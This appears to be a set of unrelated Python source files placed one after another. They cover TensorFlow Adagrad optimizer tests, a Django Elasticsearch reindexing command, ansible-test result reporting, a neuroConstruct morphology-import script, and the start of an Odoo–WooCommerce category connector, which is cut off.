Validate updated params v0_val, v1_val = self.evaluate([var0, var1]) self.assertAllCloseAccordingToType( np.array([-1.6026098728179932, -0.6026098728179932]), v0_val) self.assertAllCloseAccordingToType( np.array([2.715679168701172, 3.715679168701172]), v1_val) def testBasic(self): self.doTestBasic(use_locking=False) @test_util.run_in_graph_and_eager_modes def testBasicResource(self): self.doTestBasic(use_locking=False, use_resource=True) def testBasicCallableParams(self): with context.eager_mode(): self.doTestBasic( use_locking=False, use_resource=True, use_callable_params=True) def testBasicLocked(self): self.doTestBasic(use_locking=True) def testMinimizeSparseResourceVariable(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): var0 = 
resource_variable_ops.ResourceVariable( [[1.0, 2.0], [3.0, 4.0]], dtype=dtype) x = constant_op.constant([[4.0], [5.0]], dtype=dtype) pred = math_ops.matmul(embedding_ops.embedding_lookup([var0], [0]), x) loss = pred * pred sgd_op = adagrad.AdagradOptimizer(1.0).minimize(loss) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values self.assertAllCloseAccordingToType([[1.0, 2.0], [3.0, 4.0]], self.evaluate(var0)) # Run 1 step of sgd sgd_op.run() # Validate updated params self.assertAllCloseAccordingToType([[0, 1], [3, 4]], self.evaluate(var0), atol=0.01) def testTensorLearningRate(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): var0 = variables.Variable([1.0, 2.0], dtype=dtype) var1 = variables.Variable([3.0, 4.0], dtype=dtype) grads0 = constant_op.constant([0.1, 0.1], dtype=dtype) grads1 = constant_op.constant([0.01, 0.01], dtype=dtype) ada_opt = adagrad.AdagradOptimizer( constant_op.constant(3.0), initial_accumulator_value=0.1) ada_update = ada_opt.apply_gradients( zip([grads0, grads1], [var0, var1])) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values self.assertAllClose([1.0, 2.0], self.evaluate(var0)) self.assertAllClose([3.0, 4.0], self.evaluate(var1)) # Run 3 steps of adagrad for _ in range(3): ada_update.run() # Validate updated params self.assertAllCloseAccordingToType( np.array([-1.6026098728179932, -0.6026098728179932]), self.evaluate(var0)) self.assertAllCloseAccordingToType( np.array([2.715679168701172, 3.715679168701172]), self.evaluate(var1)) def testSparseBasic(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): var0 = variables.Variable([[1.0], [2.0]], dtype=dtype) var1 = variables.Variable([[3.0], [4.0]], dtype=dtype) grads0 = ops.IndexedSlices( constant_op.constant( [0.1], shape=[1, 1], dtype=dtype), constant_op.constant([0]), constant_op.constant([2, 1])) grads1 = ops.IndexedSlices( constant_op.constant( [0.01], shape=[1, 1], dtype=dtype), constant_op.constant([1]), constant_op.constant([2, 1])) ada_opt = adagrad.AdagradOptimizer(3.0, initial_accumulator_value=0.1) ada_update = ada_opt.apply_gradients( zip([grads0, grads1], [var0, var1])) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values self.assertAllClose([[1.0], [2.0]], self.evaluate(var0)) self.assertAllClose([[3.0], [4.0]], self.evaluate(var1)) # Run 3 step of sgd for _ in range(3): ada_update.run() # Validate updated params self.assertAllCloseAccordingToType( np.array([[-1.6026098728179932], [2.0]]), self.evaluate(var0)) self.assertAllCloseAccordingToType( np.array([[3.0], [3.715679168701172]]), self.evaluate(var1)) def testSparseRepeatedIndices(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): repeated_index_update_var = variables.Variable( [[1.0], [2.0]], dtype=dtype) aggregated_update_var = variables.Variable( [[1.0], [2.0]], dtype=dtype) grad_repeated_index = ops.IndexedSlices( constant_op.constant( [0.1, 0.1], shape=[2, 1], dtype=dtype), constant_op.constant([1, 1]), constant_op.constant([2, 1])) grad_aggregated = ops.IndexedSlices( constant_op.constant( [0.2], shape=[1, 1], dtype=dtype), constant_op.constant([1]), constant_op.constant([2, 1])) repeated_update = adagrad.AdagradOptimizer(3.0).apply_gradients( [(grad_repeated_index, 
repeated_index_update_var)]) aggregated_update = adagrad.AdagradOptimizer(3.0).apply_gradients( [(grad_aggregated, aggregated_update_var)]) self.evaluate(variables.global_variables_initializer()) self.assertAllClose(aggregated_update_var, self.evaluate(repeated_index_update_var)) for _ in range(3): repeated_update.run() aggregated_update.run() self.assertAllClose(aggregated_update_var, self.evaluate(repeated_index_update_var)) def testSparseRepeatedIndicesResourceVariable(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): var_repeated = resource_variable_ops.ResourceVariable( [1.0, 2.0], dtype=dtype) loss_repeated = math_ops.reduce_sum( embedding_ops.embedding_lookup(var_repeated, [0, 0])) var_aggregated = resource_variable_ops.ResourceVariable( [1.0, 2.0], dtype=dtype) loss_aggregated = 2 * math_ops.reduce_sum( embedding_ops.embedding_lookup(var_aggregated, [0])) update_op_repeated = adagrad.AdagradOptimizer( 2.0).minimize(loss_repeated) update_op_aggregated = adagrad.AdagradOptimizer( 2.0).minimize(loss_aggregated) self.evaluate(variables.global_variables_initializer()) self.assertAllCloseAccordingToType( self.evaluate(var_repeated), self.evaluate(var_aggregated)) for _ in range(3): update_op_repeated.run() update_op_aggregated.run() self.assertAllCloseAccordingToType( self.evaluate(var_repeated), self.evaluate(var_aggregated)) def testSparseStability(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): shape = [1, 6] var0 = variables.Variable( [[ 0.00872496, -0.106952, 0.110467, 0.226505, -0.0147257, -0.0105945 ]], dtype=dtype) grads0 = ops.IndexedSlices( constant_op.constant( [[ -5.91278e-05, 5.31673e-05, -2.5779e-06, 4.29153e-05, -8.4877e-05, -9.48906e-05 ]], shape=shape, dtype=dtype), constant_op.constant([0]), constant_op.constant(shape)) ada_opt = adagrad.AdagradOptimizer(1.0, initial_accumulator_value=0.1) ada_update = ada_opt.apply_gradients(zip([grads0], [var0])) self.assertEqual(["accumulator"], ada_opt.get_slot_names()) slot0 = ada_opt.get_slot(var0, "accumulator") init = variables.global_variables_initializer() for _ in range(100): init.run() ada_update.run() self.assertAllCloseAccordingToType( np.array([[0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]), self.evaluate(slot0)) self.assertAllCloseAccordingToType( np.array([[ 0.00891194, -0.10712013, 0.11047515, 0.22636929, -0.0144573, -0.01029443 ]]), self.evaluate(var0)) def testSharing(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): var0 = variables.Variable([1.0, 2.0], dtype=dtype) var1 = variables.Variable([3.0, 4.0], dtype=dtype) grads0 = constant_op.constant([0.1, 0.1], dtype=dtype) grads1 = constant_op.constant([0.01, 0.01], dtype=dtype) ada_opt = adagrad.AdagradOptimizer(3.0) # Apply the optimizer twice. Both applications will use # the same accums. ada_update1 = ada_opt.apply_gradients( zip([grads0, grads1], [var0, var1])) ada_update2 = ada_opt.apply_gradients( zip([grads0, grads1], [var0, var1])) self.assertEqual(["accumulator"], ada_opt.get_slot_names()) slot0 = ada_opt.get_slot(var0, "accumulator") self.assertEqual(slot0.get_shape(), var0.get_shape()) slot1 = ada_opt.get_slot(var1, "accumulator") self.assertEqual(slot1.get_shape(), var1.get_shape()) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values. 
self.assertAllClose([1.0, 2.0], self.evaluate(var0)) self.assertAllClose([3.0, 4.0], self.evaluate(var1)) # Mix the first and the second adagrad for 3 steps. ada_update1.run() ada_update2.run() ada_update1.run() # Validate updated params (the same as with only 1 Adagrad). self.assertAllCloseAccordingToType( np.array([-1.6026098728179932, -0.6026098728179932]), self.evaluate(var0)) self.assertAllCloseAccordingToType( np.array([2.715679168701172, 3.715679168701172]), self.evaluate(var1)) def testDynamicShapeVariableWithCallableInit(self): with ops.Graph().as_default(): var0 = variable_scope.get_variable("var0", initializer=constant_op.constant(1.), validate_shape=False) grads0 = constant_op.constant(0.1, dtype=dtypes.float32) learning_rate = lambda: 3.0 ada_opt = adagrad.AdagradOptimizer( learning_rate, initial_accumulator_value=0.1, use_locking=True) if not context.executing_eagerly(): ada_update = ada_opt.apply_gradients( zip([grads0], [var0])) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values v0_val = self.evaluate([var0]) self.assertAllClose([1.0], v0_val) # Run 3 steps of adagrad for _ in range(3): if not context.executing_eagerly(): self.evaluate(ada_update) else: ada_opt.apply_gradients(zip([grads0], [var0])) # Validate updated params v0_val = self.evaluate([var0]) self.assertAllCloseAccordingToType( np.array([-1.6026098728179932]), v0_val) if __name__ == "__main__": test.main()
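# --- hedged verification sketch (plain NumPy, not part of the tests above) ---
# The Adagrad update exercised throughout these tests is
#     accum += grad**2;  var -= lr * grad / sqrt(accum)
# Replaying three steps for var0 = [1.0, 2.0], grad = 0.1, lr = 3.0 and an initial
# accumulator of 0.1 reproduces the constants asserted in doTestBasic().
import numpy as np

var = np.array([1.0, 2.0])
accum = np.full_like(var, 0.1)
grad = np.array([0.1, 0.1])
lr = 3.0
for _ in range(3):
    accum += grad ** 2
    var -= lr * grad / np.sqrt(accum)
print(var)  # ~[-1.60260987, -0.60260987], matching the expected values above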
from django.core.management.base import BaseCommand, CommandError from elasticsearch import Elasticsearch from elixir.models import * from elixir.serializers import * import random, time from multiprocessing import Pool, cpu_count from rest_framework.renderers import JSONRenderer def parallel_function(x): resource = ResourceSerializer(Resource.objects.get(id=x[0]), many=False).data return JSONRenderer().render(resource) def parallel_function_v2(x): resource = LegacyResourceSerializer(Resource.objects.get(id=x[0]), many=False).data return JSONRenderer().render(resource) class Command(BaseCommand): help = 'Regenerate the Elasticsearch index' def handle(self, *args, **options): self.stdout.write('Regenerating the ES') es = Elasticsearch([{'host': 'localhost', 'port': 9200}]) resourceList = Resource.objects.filter(visibility=1) self.stdout.write('--------------------\nid\t:\tname\n--------------------') # if sending with curl you need to wrap the object below -> {"mappings": object} mapping_subdomains = { "subdomains": { "properties": { "domain": { "type": "string", "fields": { "raw": { "type": "string", "index": "not_analyzed" } } }, "resources": { "properties": { "biotoolsID": { "type": "string", "fields": { "raw": { "type": "string", "index": "not_analyzed" } } }, "versionId": { "type": "string", "fields": { "raw": { "type": "string", "index": "not_analyzed" } } } } } } } } es.indices.create('elixir', ignore=400) es.indices.create('elixir_v2', ignore=400) time.sleep(3) # ADD SETTINGS settings = { "analysis": { "analyzer": { "not_analyzed_case_insensitive":{ "tokenizer":"keyword", "filter":"lowercase" } } }, "index": { "max_result_window": 50000 } } es.indices.close (index='elixir') es.indices.close (index='elixir_v2') es.indices.put_settings (index='elixir', body=settings) es.indices.put_settings (index='elixir_v2', body=settings) es.indices.open (index='elixir') es.indices.open (index='elixir_v2') # ADD MAPPING mapping = { "tool" : { "properties" : { "collectionID" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True, "fields": { "raw": { "type": "keyword" } } }, "description" : { "type" : "text", "analyzer": "english", "fielddata": True }, "homepage" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, "name" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True, "fields": { "raw": { "type": "keyword" } } }, "topic" : { "properties" : { "term" : { "type" : "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type": "keyword" } } } } }, "function": { "properties": { "note": { "type": "text", "analyzer": "english", "fielddata": True }, "cmd": { "type": "text", "analyzer": "english", "fielddata": True }, "input": { "properties": { "data": { "properties": { "term": { "type": "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True } } } } }, "format": { "properties": { "term": { "type": "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True } } } } } } }, "output": { "properties": { "data": { "properties": { "term": { "type": "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True } } } } }, "format": { "properties": { "term": { "type": "text", "analyzer": "english", "fielddata": True, "fields": { 
"raw": { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True } } } } } } }, "operation": { "properties": { "term": { "type": "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type": "keyword" } } } } } } }, # "contact" : { # "properties" : { # "name" : { # "type" : "text", # "analyzer": "english", # "fielddata": True # } # } # }, # Maybe add other fields here like credit orcidid, credit elixirPlatform , elixirNode "credit" : { "properties" : { "note" : { "type" : "text", "analyzer": "english", "fielddata": True }, "name" : { "type" : "text", "analyzer": "english", "fielddata": True, "fields": { "raw": { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True } } } } }, "documentation" : { "properties" : { "note" : { "type" : "text", "analyzer": "english", "fielddata": True } } }, "biotoolsID" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, "id" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, "language" : { "type" : "text", "fielddata": True, "analyzer": "not_analyzed_case_insensitive" }, "license" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, "operatingSystem" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, # "otherID" : { # "properties" : { # "value" : { # "type" : "text", # "analyzer": "not_analyzed_case_insensitive", # "fielddata": True # }, # "type" : { # "type" : "text", # "analyzer": "not_analyzed_case_insensitive", # "fielddata": True # }, # "version" : { # "type" : "text", # "analyzer": "not_analyzed_case_insensitive", # "fielddata": True # } # } # }, "toolType" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, "version" : { "type" : "text", "analyzer": "not_analyzed_case_insensitive", "fielddata": True }, # "version" : { # "properties" : { # "version" : { # "type" : "text", # "analyzer": "english", # "fielddata": True # } # } # }, "versionId" : { "type" : "text", "fielddata": True, "analyzer": "not_analyzed_case_insensitive" }, "maturity" : { "type" : "text", "fielddata": True, "analyzer": "not_analyzed_case_insensitive" }, "cost" : { "type" : "text", "fielddata": True, "analyzer": "not_analyzed_case_insensitive" }, "owner" : { "type" : "text", "fielddata": True, "analyzer": "not_analyzed_case_insensitive" } } } } es.indices.put_mapping(index='elixir', doc_type='tool', body=mapping) es.indices.put_mapping(index='elixir_v2', doc_type='tool', body=mapping) es.indices.create('domains') es.indices.put_mapping(index='domains', doc_type='subdomains', body=mapping_subdomains) rl_id = Resource.objects.filter(visibility=1).values_list('id') pool = Pool(processes=cpu_count()) # schema 2.0 res_v2 = pool.map_async(parallel_function_v2, rl_id) results_v2 = res_v2.get(timeout=10000) for el in results_v2: es.index(index='elixir_v2', doc_type='tool', body=el) # schema 3.0 res = pool.map_async(parallel_function, rl_id) results = res.get(timeout=10000) for el in results: es.index(index='elixir', doc_type='tool', body=el) # for resourceItem in resourceList: # resource = ResourceSerializer(resourceItem, many=False).data # self.stdout.write('%s\t:\t%s' % (resource['id'], resource['name'])) # es.index(index='elixir', doc_type='tool', body=resource) # this is not really correct because the there are multiple versions to a resource # should probably be the same for domain resource , or just remove version and versionId for domain in 
Domain.objects.all(): es.index(index='domains', doc_type='subdomains', body={'domain':domain.name, 'title': domain.title, 'sub_title': domain.sub_title, 'description': domain.description, 'resources': map(lambda x: {'biotoolsID': x.biotoolsID, 'versionId': x.versionId, 'name': x.name, 'version': x.version}, domain.domainresource_set.all())}) self.stdout.write('%s'%(domain.name)) # for domain in Domain.objects.all(): # es.index(index='domains', doc_type='subdomains', body={'domain':domain.name, 'title': domain.title, 'sub_title': domain.sub_title, 'description': domain.description, 'resources': map(lambda x: {'biotoolsID': x.biotoolsID, 'versionId': x.versionId, 'name': x.name}, domain.domainresource_set.all())}) # self.stdout.write('%s'%(domain.name))
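# --- hedged query sketch (standalone, not part of the management command above) ---
# Once the index is populated, the english-analysed fields support free-text search
# while the keyword ".raw" sub-fields support exact filtering.  Index and doc_type
# names match the command; the query values are hypothetical, and the doc_type
# argument assumes the pre-7.x elasticsearch-py client this command targets.
from elasticsearch import Elasticsearch

es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
result = es.search(index='elixir', doc_type='tool', body={
    'query': {
        'bool': {
            'must': [{'match': {'description': 'sequence alignment'}}],
            'filter': [{'term': {'collectionID.raw': 'EMBOSS'}}],
        }
    }
})
print(result['hits']['total'])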
"""Classes for storing and processing test results.""" from __future__ import absolute_import, print_function import datetime import json import os from lib.util import ( display, ) from lib.config import ( TestConfig, ) def calculate_best_confidence(choices, metadata): """ :type choices: tuple[tuple[str, int]] :type metadata: Metadata :rtype: int """ best_confidence = 0 for path, line in choices: confidence = calculate_confidence(path, line, metadata) best_confidence = max(confidence, best_confidence) return best_confidence def calculate_confidence(path, line, metadata): """ :type path: str :type line: int :type metadata: Metadata :rtype: int """ ranges = metadata.changes.get(path) # no changes were made to the file if not ranges: return 0 # changes were made to the same file and line if any(r[0] <= line <= r[1] in r for r in ranges): return 100 # changes were made to the same file and the line number is unknown if line == 0: return 75 # changes were made to the same file and the line number is different return 50 class TestResult(object): """Base class for test results.""" def __init__(self, command, test, python_version=None): """ :type command: str :type test: str :type python_version: str """ self.command = command self.test = test self.python_version = python_version self.name = self.test or self.command if self.python_version: self.name += '-python-%s' % self.python_version try: import junit_xml except ImportError: junit_xml = None self.junit = junit_xml def write(self, args): """ :type args: TestConfig """ self.write_console() self.write_bot(args) if args.lint: self.write_lint() if args.junit: if self.junit: self.write_junit(args) else: display.warning('Skipping junit xml output because the `junit-xml` python package was not found.', unique=True) def write_console(self): """Write results to console.""" pass def write_lint(self): """Write lint results to stdout.""" pass def write_bot(self, args): """ :type args: TestConfig """ pass def write_junit(self, args): """ :type args: TestConfig """ pass def create_path(self, directory, extension): """ :type directory: str :type extension: str :rtype: str """ path = 'test/results/%s/ansible-test-%s' % (directory, self.command) if self.test: path += '-%s' % self.test if self.python_version: path += '-python-%s' % self.python_version path += extension return path def save_junit(self, args, test_case, properties=None): """ :type args: TestConfig :type test_case: junit_xml.TestCase :type properties: dict[str, str] | None :rtype: str | None """ path = self.create_path('junit', '.xml') test_suites = [ self.junit.TestSuite( name='ansible-test', test_cases=[test_case], timestamp=datetime.datetime.utcnow().replace(microsecond=0).isoformat(), properties=properties, ), ] report = self.junit.TestSuite.to_xml_string(test_suites=test_suites, prettyprint=True, encoding='utf-8') if args.explain: return with open(path, 'wb') as xml: xml.write(report.encode('utf-8', 'strict')) class TestTimeout(TestResult): """Test timeout.""" def __init__(self, timeout_duration): """ :type timeout_duration: int """ super(TestTimeout, self).__init__(command='timeout', test='') self.timeout_duration = timeout_duration def write(self, args): """ :type args: TestConfig """ message = 'Tests were aborted after exceeding the %d minute time limit.' % self.timeout_duration # Include a leading newline to improve readability on Shippable "Tests" tab. # Without this, the first line becomes indented. 
output = ''' One or more of the following situations may be responsible: - Code changes have resulted in tests that hang or run for an excessive amount of time. - Tests have been added which exceed the time limit when combined with existing tests. - Test infrastructure and/or external dependencies are operating slower than normal.''' if args.coverage: output += '\n- Additional overhead from collecting code coverage has resulted in tests exceeding the time limit.' output += '\n\nConsult the console log for additional details on where the timeout occurred.' timestamp = datetime.datetime.utcnow().replace(microsecond=0).isoformat() # hack to avoid requiring junit-xml, which isn't pre-installed on Shippable outside our test containers xml = ''' <?xml version="1.0" encoding="utf-8"?> <testsuites disabled="0" errors="1" failures="0" tests="1" time="0.0"> \t<testsuite disabled="0" errors="1" failures="0" file="None" log="None" name="ansible-test" skipped="0" tests="1" time="0" timestamp="%s" url="None"> \t\t<testcase classname="timeout" name="timeout"> \t\t\t<error message="%s" type="error">%s</error> \t\t</testcase> \t</testsuite> </testsuites> ''' % (timestamp, message, output) path = self.create_path('junit', '.xml') with open(path, 'w') as junit_fd: junit_fd.write(xml.lstrip()) class TestSuccess(TestResult): """Test success.""" def write_junit(self, args): """ :type args: TestConfig """ test_case = self.junit.TestCase(classname=self.command, name=self.name) self.save_junit(args, test_case) class TestSkipped(TestResult): """Test skipped.""" def write_console(self): """Write results to console.""" display.info('No tests applicable.', verbosity=1) def write_junit(self, args): """ :type args: TestConfig """ test_case = self.junit.TestCase(classname=self.command, name=self.name) test_case.add_skipped_info('No tests applicable.') self.save_junit(args, test_case) class TestFailure(TestResult): """Test failure.""" def __init__(self, command, test, python_version=None, messages=None, summary=None): """ :type command: str :type test: str :type python_version: str | None :type messages: list[TestMessage] | None :type summary: unicode | None """ super(TestFailure, self).__init__(command, test, python_version) if messages: messages = sorted(messages, key=lambda m: m.sort_key) else: messages = [] self.messages = messages self.summary = summary def write(self, args): """ :type args: TestConfig """ if args.metadata.changes: self.populate_confidence(args.metadata) super(TestFailure, self).write(args) def write_console(self): """Write results to console.""" if self.summary: display.error(self.summary) else: if self.python_version: specifier = ' on python %s' % self.python_version else: specifier = '' display.error('Found %d %s issue(s)%s which need to be resolved:' % (len(self.messages), self.test or self.command, specifier)) for message in self.messages: display.error(message.format(show_confidence=True)) def write_lint(self): """Write lint results to stdout.""" if self.summary: command = self.format_command() message = 'The test `%s` failed. See stderr output for details.' % command path = 'test/runner/ansible-test' message = TestMessage(message, path) print(message) else: for message in self.messages: print(message) def write_junit(self, args): """ :type args: TestConfig """ title = self.format_title() output = self.format_block() test_case = self.junit.TestCase(classname=self.command, name=self.name) # Include a leading newline to improve readability on Shippable "Tests" tab. 
# Without this, the first line becomes indented. test_case.add_failure_info(message=title, output='\n%s' % output) self.save_junit(args, test_case) def write_bot(self, args): """ :type args: TestConfig """ docs = self.find_docs() message = self.format_title(help_link=docs) output = self.format_block() if self.messages: verified = all((m.confidence or 0) >= 50 for m in self.messages) else: verified = False bot_data = dict( verified=verified, docs=docs, results=[ dict( message=message, output=output, ), ], ) path = self.create_path('bot', '.json') if args.explain: return with open(path, 'w') as bot_fd: json.dump(bot_data, bot_fd, indent=4, sort_keys=True) bot_fd.write('\n') def populate_confidence(self, metadata): """ :type metadata: Metadata """ for message in self.messages: if message.confidence is None: message.confidence = calculate_confidence(message.path, message.line, metadata) def format_command(self): """ :rtype: str """ command = 'ansible-test %s' % self.command if self.test: command += ' --test %s' % self.test if self.python_version: command += ' --python %s' % self.python_version return command def find_docs(self): """ :rtype: str """ testing_docs_url = 'https://docs.ansible.com/ansible/devel/dev_guide/testing' testing_docs_dir = 'docs/docsite/rst/dev_guide/testing' url = '%s/%s/' % (testing_docs_url, self.command) path = os.path.join(testing_docs_dir, self.command) if self.test: url += '%s.html' % self.test path = os.path.join(path, '%s.rst' % self.test) if os.path.exists(path): return url return None def format_title(self, help_link=None): """ :type help_link: str | None :rtype: str """ command = self.format_command() if self.summary: reason = 'the error' else: reason = '1 error' if len(self.messages) == 1 else '%d errors' % len(self.messages) if help_link: help_link_markup = ' [[explain](%s)]' % help_link else: help_link_markup = '' title = 'The test `%s`%s failed with %s:' % (command, help_link_markup, reason) return title def format_block(self): """ :rtype: str """ if self.summary: block = self.summary else: block = '\n'.join(m.format() for m in self.messages) message = block.strip() # Hack to remove ANSI color reset code from SubprocessError messages. message = message.replace(display.clear, '') return message class TestMessage(object): """Single test message for one file.""" def __init__(self, message, path, line=0, column=0, level='error', code=None, confidence=None): """ :type message: str :type path: str :type line: int :type column: int :type level: str :type code: str | None :type confidence: int | None """ self.path = path self.line = line self.column = column self.level = level self.code = code self.message = message self.confidence = confidence def __str__(self): return self.format() def format(self, show_confidence=False): """ :type show_confidence: bool :rtype: str """ if self.code: msg = '%s %s' % (self.code, self.message) else: msg = self.message if show_confidence and self.confidence is not None: msg += ' (%d%%)' % self.confidence return '%s:%s:%s: %s' % (self.path, self.line, self.column, msg) @property def sort_key(self): """ :rtype: str """ return '%s:%6d:%6d:%s:%s' % (self.path, self.line, self.column, self.code or '', self.message)
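# --- hedged usage sketch (uses the TestMessage class defined above) ---
# TestMessage renders one finding as "path:line:column: [code ]message[ (NN%)]" and
# sort_key orders messages by path, then line and column.  Values are hypothetical.
if __name__ == '__main__':
    msg = TestMessage('option documented but not implemented',
                      'lib/ansible/modules/demo.py',
                      line=12, column=5, code='E322', confidence=80)
    print(msg.format(show_confidence=True))
    # -> lib/ansible/modules/demo.py:12:5: E322 option documented but not implemented (80%)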
# # # A file which opens a neuroConstruct project, loads a cell morphology file # and adds the cell to the project # # Author: Padraig Gleeson # # This file has been developed as part of the neuroConstruct project # This work has been funded by the Medical Research Council # # try: from java.io import File except ImportError: print "Note: this file should be run using ..\\nC.bat -python XXX.py' or './nC.sh -python XXX.py'" print "See http://www.neuroconstruct.org/docs/python.html for more details" quit() from ucl.physiol.neuroconstruct.project import ProjectManager from ucl.physiol.neuroconstruct.cell.converters import MorphMLConverter # Load an existing neuroConstruct project projFile = File("TestPython/TestPython.neuro.xml") print "Loading project from file: " + projFile.getAbsolutePath()+", exists: "+ str(projFile.exists()) pm = ProjectManager() myProject = pm.loadProject(projFile) print "Loaded project: " + myProject.getProjectName() morphDir = File("../osb/showcase/neuroConstructShowcase/Ex3_Morphology/importedMorphologies/") morphmlFile = File(morphDir, "SimplePurkinjeCell.morph.xml") print "Going to load morphology from: " + morphmlFile.getCanonicalPath() converter = MorphMLConverter() cell = converter.loadFromMorphologyFile(morphmlFile, "NewCell") print "Loaded cell: " + cell.getInstanceName() + " with " + str(cell.getAllSegments().size()) +" segments" myProject.cellManager.addCellType(cell) # Actually add it to the project myProject.cellGroupsInfo.setCellType("SampleCellGroup", cell.getInstanceName()) # Set the type of an existing cell group to this # Now the project can be generated as in Ex5_MultiSimGenerate.py # * OR * # Save project # Uncomment these lines to save the morphology in the project, then view the # updated project in neuroConstruct ''' myProject.markProjectAsEdited() myProject.saveProject() # Run neuroConstruct and check that the cell has been added from ucl.physiol.neuroconstruct.gui import MainFrame from ucl.physiol.neuroconstruct.utils import GuiUtils frame = MainFrame() GuiUtils.centreWindow(frame) frame.setVisible(1) frame.doLoadProject(projFile.getCanonicalPath()) '''
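# --- hedged follow-up sketch (same Jython session as the script above) ---
# A quick sanity check on the imported morphology is to look at the first few
# segments returned by getAllSegments(); element access via get() assumes the
# usual java.util.List interface on the returned collection.
segs = cell.getAllSegments()
for i in range(min(3, segs.size())):
    print "Segment %i: %s" % (i, segs.get(i))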
# -*- coding: utf-8 -*- # # # Tech-Receptives Solutions Pvt. Ltd. # Copyright (C) 2009-TODAY Tech-Receptives(<http://www.techreceptives.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # import logging import xmlrpclib from openerp import models, fields from openerp.addons.connector.queue.job import job from openerp.addons.connector.exception import MappingError from openerp.addons.connector.unit.mapper import (mapping, ImportMapper ) from openerp.addons.connector.exception import IDMissingInBackend from ..unit.backend_adapter import (GenericAdapter) from ..unit.import_synchronizer import (DelayedBatchImporter, WooImporter) from ..connector import get_environment from ..backend import woo _logger = logging.getLogger(__name__) class WooProductCategory(models.Model): _name = 'woo.product.category' _inherit = 'woo.binding' _inherits = {'product.category': 'openerp_id'} _description = 'woo product category' _rec_name = 'name' openerp_id = fields.Many2one(comodel_name='product.category', string='category', required=True, ondelete='cascade') backend_id = fields.Many2one( comodel_name='wc.backend', string='Woo Backend', store=True, readonly=False, ) slug = fields.Char('Slung Name') woo_parent_id = fields.Many2one( comodel_name='woo.product.category', string='Woo Parent Category', ondelete='cascade',) description = fields.Char('Description') count = fields.Integer('count') @woo class CategoryAdapter(GenericAdapter): _model_name = 'woo.product.category' _woo_model = 'products/categories' def _call(self, method, arguments): try: return super(CategoryAdapter, self)._call(method, arguments) except xmlrpclib.Fault as err: # this is the error in the WooCommerce API # when the customer does not exist if err.faultCode == 102: raise IDMissingInBackend else: raise def search(self, filters=None, from_date=None, to_date=None): """ Search records according to some criteria and return a list of ids :rtype: list """ if filters is None: filters = {} WOO_DATETIME_FORMAT = '%Y/%m/%d %H:%M:%S' dt_fmt = WOO_DATETIME_FORMAT if from_date is not None: filters.setdefault('updated_at', {}) filters['updated_at']['from'] = from_date.strftime(dt_fmt) if to_date is not None: filters.setdefault('updated_at', {}) filters['updated_at']['to'] = to_date.strftime(dt_fmt) return self._call('products/categories/list', [filters] if filters else [{}]) @woo class CategoryBatchImporter(DelayedBatchImporter): """ Import the WooCommerce Partners. For every partner in the list, a delayed job is created. 
""" _model_name = ['woo.product.category'] def _import_record(self, woo_id, priority=None): """ Delay a job for the import """ super(CategoryBatchImporter, self)._import_record( woo_id, priority=priority) def run(self, filters=None): """ Run the synchronization """ from_date = filters.pop('from_date', None) to_date = filters.pop('to_date', None) record_ids = self.backend_adapter.search( filters, from_date=from_date, to_date=to_date, ) _logger.info('search for woo Product Category %s returned %s', filters, record_ids) for record_id in record_ids: self._import_record(record_id) CategoryBatchImporter = CategoryBatchImporter @woo class ProductCategoryImporter(WooImporter): _model_name = ['woo.product.category'] def _import_dependencies(self): """ Import the dependencies for the record""" record = self.woo_record # import parent category # the root category has a 0 parent_id record = record['product_category'] if record['parent']: parent_id = record['parent'] if self.binder.to_openerp(parent_id) is None: importer = self.unit_for(WooImporter) importer.run(parent_id) return def _create(self, data): openerp_binding = super(ProductCategoryImporter, self)._create(data) return openerp_binding def _after_import(self, binding): """ Hook called at the end of the import """ return ProductCategoryImport = ProductCategoryImporter @woo class ProductCategoryImportMapper(ImportMapper): _model_name = 'woo.product.category' @mapping def name(self, record): if record['product_category']: rec = record['product_category'] return {'name': rec['name']} @mapping def 